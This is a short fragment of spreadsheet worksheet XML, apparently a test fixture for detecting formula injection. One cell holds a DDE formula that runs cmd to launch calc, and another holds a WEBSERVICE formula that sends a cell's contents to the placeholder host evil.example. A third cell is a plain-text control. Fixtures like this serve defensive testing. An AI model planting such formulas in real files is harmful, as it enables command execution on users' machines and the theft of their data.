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f>DDE("WINWORD","C:\\windows\\system32\\cmd /c calc")</f>
        <v>0</v>
      </c>
      <c r="B1">
        <f>WEBSERVICE("http://evil.example/exfil?data="&amp;A1)</f>
        <v>0</v>
      </c>
      <c r="C1" t="str">
        <v>plain text control</v>
      </c>
    </row>
  </sheetData>
</worksheet>
</file>